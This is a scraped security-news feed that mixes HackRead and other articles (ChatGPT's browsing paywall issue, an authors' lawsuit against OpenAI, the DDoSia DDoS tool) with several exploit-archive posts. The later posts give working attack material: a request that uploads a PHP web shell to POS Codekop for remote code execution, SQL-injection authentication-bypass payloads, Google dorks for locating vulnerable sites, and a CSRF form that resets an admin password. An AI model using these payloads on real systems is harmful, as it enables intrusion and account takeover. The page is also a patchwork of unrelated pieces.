By Waqas
The feature that allows users to browse with the Bing browser is only available for paid ChatGPT users.
This is a post from HackRead.com Read the original post: ChatGPT’s Bing Browsing Feature Disabled for Paywall Article Access

**The feature was disabled by OpenAI, the creator of ChatGPT, on July 3rd, and it will remain suspended until the company fixes this issue in order to do right by content owners.**

ChatGPT has been involved in several legal battles, and the last thing its creators want is to open another front. The AI chatbot is undoubtfully a gift for internet users in recent times, and gaining the ability to add plugins to the AI-powered chatbot is the cherry on top.

The plugins that helped users connect ChatGPT to the internet were the most sought-after ones. One such plugin was the Browsing model, also known as Browse with Bing, which used the Bing search API to enable internet access.

This Beta feature was available for ChatGPT Plus subscribers and integrated the search engine into the conversation, allowing the user to access information from the web. When it was rolled out, the feature tremendously enhanced ChatGPT’s utility by making it possible to merge the internet and the AI chatbot.

However, this much-talked-about feature has now been disabled by OpenAI, the creator of ChatGPT, because it allowed users to access paywalled articles. Reportedly, the paywalled content was accessible through the “Print the Content of this Article” prompt by pasting the article’s URL after it. ChatGPT would then display the content of the article. For example, if a user asked for the full text of a specific URL, it fulfilled this request.

One of ChatGPT’s users shared this screenshot on Twitter. (Credit: @wunderwuzzi23)

The company stated that this feature inadvertently displayed content it wasn’t meant to show, violating the terms and services of most subscription-based online publications. Therefore, OpenAI disabled this feature on July 3rd, and it will remain suspended until the company fixes this issue in order to do right by content owners. ChatGPT won’t display information beyond September 2021, its training data cutoff date.

The company asserts that the feature will be back soon. However, until this happens, the unexpected disabling has disappointed ChatGPT users as they are in disbelief that this glitch was detected at the beta stage when it should have been fixed in the Alpha stages. According to reports, users who had paid for the Chat with Bing feature are asking for refunds as the service is not available anymore.

However, OpenAI has confirmed that the feature has been temporarily disabled, and their team is diligently working on reintroducing it after ensuring that it complies with the performance and content accuracy.

Nevertheless, there is confusion as OpenAI hasn’t disclosed when the feature will be available. We will update our readers as soon as there is any new development in this story.

**RELATED ARTICLES**

1.  100,000 Hacked ChatGPT Accounts Discovered on Dark Web
2.  ChatGPT’s False Information Generation Enables Code Malware
3.  ChatGPT tricked into generating Windows 10 and Windows 11 keys
4.  ChatGPT Improves Healthcare, But Industry Needs Secure Database
5.  OpenAI Launches ChatGPT Bug Bounty Program – Earn $200 to $20k

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChatGPT’s Bing Browsing Feature Disabled for Paywall Article Access

By Habiba Rashid
Another day, another lawsuit against the developers of the groundbreaking AI chatbot ChatGPT.
This is a post from HackRead.com Read the original post: Authors Sue OpenAI: ChatGPT’s Training Methods Challenged in Lawsuit

**The lawsuit, brought forth by science fiction and horror author Paul Tremblay and novelist Mona Awad, accuses OpenAI of training ChatGPT on copyrighted books without obtaining proper consent, credit, or compensation from the authors.**

OpenAI, the prominent artificial intelligence (AI) company behind the popular ChatGPT chatbot, is facing yet another legal challenge. A class action lawsuit was filed against OpenAI in federal court on Wednesday, alleging copyright infringement and privacy violations related to the company’s training methods and data usage.

The lawsuit (PDF) doesn’t come as a surprise considering that ChatGPT is a relatively new chatbot, and may take some time for trainers to address copyright violation issues. It’s worth noting that these problems aren’t limited to ChatGPT alone; other AI systems like Microsoft’s Bing AI and Google’s BARD AI have also faced similar violations. For instance, just a couple of weeks ago, users managed to trick ChatGPT, Bing AI, and BARD AI into generating activation keys for Windows 10 and Windows 11.

The lawsuit, brought forth by science fiction and horror author Paul Tremblay and novelist Mona Awad, accuses OpenAI of training ChatGPT on copyrighted books without obtaining proper consent, credit, or compensation from the authors. The authors claim that since ChatGPT is capable of providing accurate summaries of their works, it indicates that their books were copied and incorporated into OpenAI’s language model without permission.

The complaint points to a 2020 OpenAI paper that mentions the use of “two internet-based book corpora” for training ChatGPT, suggesting that one of these datasets, consisting of over 290,000 titles, may have originated from “shadow libraries” like Library Genesis and Sci-Hub. These shadow libraries are known for illegally publishing copyrighted works using torrent systems. The authors argue that OpenAI’s utilization of these datasets infringes copyright law and further allege that ChatGPT removes copyright notices from the books, violating the Digital Millennium Copyright Act.

The lawsuit, according to Bloomberg Law, also argues that OpenAI has integrated social media apps such as Spotify, Snapchat, Stripe, Slack, and Microsoft Teams with its systems to collect personal user data including images, locations, music tastes, financial details, and private communications. Gathering such data is a violation of the terms of service these platforms offer the lawsuit claims.

OpenAI has also been separately sued in a sweeping class action lawsuit, accusing the company of unlawfully collecting personal information from the internet through its AI models, including ChatGPT and the text-to-image generator DALL-E. The lawsuit asserts that such data scraping violates various state and federal privacy laws. This legal battle highlights the growing concerns surrounding AI technology and the need for regulations to address potential privacy breaches.

These lawsuits could have far-reaching consequences for OpenAI and the AI industry as a whole. The outcomes may set important precedents regarding AI, copyright infringement, and privacy, influencing future regulatory frameworks. If the court rules in favour of the plaintiffs, OpenAI may face substantial financial penalties, potentially impacting its financial stability and fundraising efforts. Additionally, the lawsuits could tarnish the company’s reputation, leading to increased scrutiny from regulators and the need for further transparency.

The implications extend beyond OpenAI, as companies utilizing ChatGPT or other OpenAI products may reconsider their partnerships to safeguard their reputations and protect user privacy. Moreover, if the courts determine that using copyrighted material for training AI models constitutes infringement, OpenAI and other companies may need to reconsider their data acquisition practices.

As these legal battles unfold, industry observers must monitor the progress of these lawsuits. The outcomes may result in new laws and policies, reshape AI development practices, and require companies to adapt their offerings to align with evolving legal and privacy standards.

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Authors Sue OpenAI: ChatGPT’s Training Methods Challenged in Lawsuit

POS Codekop version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)# Date: 25-05-2023# Exploit Author: yuyudhn# Vendor Homepage: https://www.codekop.com/# Software Link: https://github.com/fauzan1892/pos-kasir-php# Version: 2.0# Tested on: Linux# CVE: CVE-2023-36348# Vulnerability description: The application does not sanitize the filenameparameter when sending data to /fungsi/edit/edit.php?gambar=user. Anattacker can exploit this issue by uploading a PHP file and accessing it,leading to Remote Code Execution.# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/# Proof of Concept:1. Login to POS Codekop dashboard.2. Go to profile settings.3. Upload PHP script through Upload Profile Photo.Burp Log Example:```POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1Host: localhostContent-Length: 8934Cache-Control: max-age=0sec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""**Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-User: ?1**Sec-Fetch-Dest: documentReferer: http://localhost/research/pos-kasir-php/index.php?page=userAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhvConnection: close------WebKitFormBoundarymVBHqH4m6KgKBnpaContent-Disposition: form-data; name="foto"; filename="asuka-rce.php"Content-Type: image/jpegÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>ÿÛC-----------------------------```PHP Web Shell location:http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php

POS Codekop 2.0 Shell Upload

The threat actors behind the DDoSia attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down.
The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the

The threat actors behind the **DDoSia** attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down.

The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the \[command-and-control\] to the users," cybersecurity company Sekoia said in a technical write-up.

DDoSia is attributed to a pro-Russian hacker group called NoName(057)16. Launched in 2022 and a successor of the Bobik botnet, the attack tool is designed for staging distributed denial-of-service (DDoS) attacks against targets primarily located in Europe as well as Australia, Canada, and Japan.

Lithuania, Ukraine, Poland, Italy, Czechia, Denmark, Latvia, France, the U.K., and Switzerland have emerged as the most targeted countries over a period ranging from May 8 to June 26, 2023. A total of 486 different websites were impacted.

Python and Go-based implementations of DDoSia have been unearthed to date, making it a cross-platform program capable of being used across Windows, Linux, and macOS systems.

"DDoSia is a multi-threaded application that conducts denial-of-service attacks against target sites by repeatedly issuing network requests," SentinelOne explained in an analysis published in January 2023. "DDoSia issues requests as instructed by a configuration file that the malware receives from a C2 server when started."

DDoSia is distributed through a fully-automated process on Telegram that allows individuals to register for the crowdsourced initiative in exchange for a cryptocurrency payment and a ZIP archive containing the attack toolkit.

What's noteworthy about the new version is the use of encryption to mask the list of targets to be attacked, indicating that the tool is being actively maintained by the operators.

"NoName057(16) is making efforts to make their malware compatible with multiple operating systems, almost certainly reflecting their intent to make their malware available to a large number of users, resulting in the targeting of a broader set of victims," Sekoia said.

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of targeted denial-of-service (DoS) and DDoS attacks against multiple organizations in multiple sectors.

"These attacks can cost an organization time and money and may impose reputational costs while resources and services are inaccessible," the agency said in a bulletin.

Although CISA did not provide any additional specifics, the warning overlaps with claims by Anonymous Sudan on its Telegram channel that it had taken down the websites of the Department of Commerce, Social Security Administration (SSA), and the Treasury Department's Electronic Federal Tax Payment System (EFTPS).

Anonymous Sudan attracted attention last month for carrying Layer 7 DDoS attacks against various Microsoft services, including OneDrive, Outlook, and Azure web portals. The tech giant is tracking the cluster under the name Storm-1359.

The hacking crew has asserted it's conducting cyber strikes out of Africa on behalf of oppressed Muslims across the world. But cybersecurity researchers believe it to be a pro-Kremlin operation with no ties to Sudan and a member of the KillNet hacktivist collective.

In an analysis released on June 19, 2023, Australian cybersecurity vendor CyberCX characterized the entity as a "smokescreen for Russian interests." The company's website has since become inaccessible, greeting visitors with a "403 Forbidden" message. The threat actor claimed responsibility for the cyber attack.

"The reason for the attack: stop spreading rumors about us, and you must tell the truth and stop the investigations that we call the investigations of a dog," Anonymous Sudan said in a message posted on June 22, 2023.

Anonymous Sudan, in a Bloomberg report last week, further denied it was connected to Russia but acknowledged they share similar interests, and that it goes after "everything that is hostile to Islam."

CISA's latest advisory has also not gone unnoticed, for the group posted a response on June 30, 2023, stating: "A small Sudanese group with limited capabilities forced 'the most powerful government' in the world to publish articles and tweets about our attacks."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors

The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.

CVE-2023-3133: Tutor LMS – eLearning and online course solution

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

AppleZeed CMS 2.0 SQL Injection

ApPHP MicroCMS version 1.0.1 re-embeds arbitrary content from the client into web pages.

====================================================================================================================================  
| # Title     : ApPHP MicroCMS v1.0.1 Host header attack Vulnerability                                                             |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro)                                                                                        |  
| # Vendor    : http://www.apphp.com/php-microcms/                                                                                 |    
| # Dork      : ApPHP MicroCMS © ApPHP Admin Login                                                                                 |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine

[+] Vulnerability description :

    An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways.   
    Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP).   
    Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to:   
    <link href="http://_SERVER['HOST']"    (Joomla)  
    ...and append secret keys and tokens to links containing it:   
    <a href="http://_SERVER['HOST']?token=topsecret">  (Django, Gallery, others)  
    ....and even directly import scripts from it:   
    <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4">  (Various)

    [+] This vulnerability affects : /phpmicrocms/index.php. 

[+] Attack details : 

    Host header evilhostK8kAwlbV.com was reflected inside a A tag (href attribute).

[+] The impact of this vulnerability :

    An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways.

[+] How to fix this vulnerability :

    The web application should use the SERVER_NAME instead of the Host header. It should also create a dummy vhost that catches all requests with unrecognized Host headers. This can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. Consult references for detailed information.

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

ApPHP MicroCMS 1.0.1 Host Header Injection

ApnaTrademark CMS version 2.5 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : ApnaTrademark CMS V2.5 Auth by pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://apnatrademark.com/aboutus.php                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload in user & pass : 1'or'1'='1[+] http://127.0.0.1/apnatrademarkcom/admin/====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

ApnaTrademark CMS 2.5 SQL Injection

Allhandsmarketing CMS version 3.01 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Allhandsmarketing CMS v3.01 SQL Injection Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://www.allhandsmarketing.com/                                                                                  |  | # Dork      : " Design by Allhandsmarketing."                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/laemsingwhitehousenet/showdeals-details.php?id=21 <====| inject here[+] http://127.0.0.1/pannresidence.com/backend/ <====| LoginGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Allhandsmarketing CMS 3.01 SQL Injection

Allhandsmarketing LMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Allhandsmarketing LMS v2.0 CSRF Vulnerability                                                                      |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : http://www.allhandsmarketing.com/                                                                                  |    
| # Dork      : " Design by Allhandsmarketing."                                                                                    |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin Password.

[+] Go to the line 1.

[+] Set the target site link Save changes and apply . 

[+] infected file : /backend/add_newPassword.php .

[+] save code as poc.html .

[+] default user : admin

[+] <form class="form-horizontal" action="http://TARGET/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">  
                                    </div>  
                                </div>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>  
                                </div>

                                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>  
                                </div>

                                                            </fieldset>

                            <div class="">  
                                <div class="row">  
                                    <div class="col-md-12">  
                                        <button class="btn btn-default" type="clear">  
                                            Cancel  
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">  
                                            <i class="fa fa-save"></i>  
                                            Submit  
                                        </button>  
                                    </div>  
                                </div>  
                            </div>

                        </form>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Tag

#windows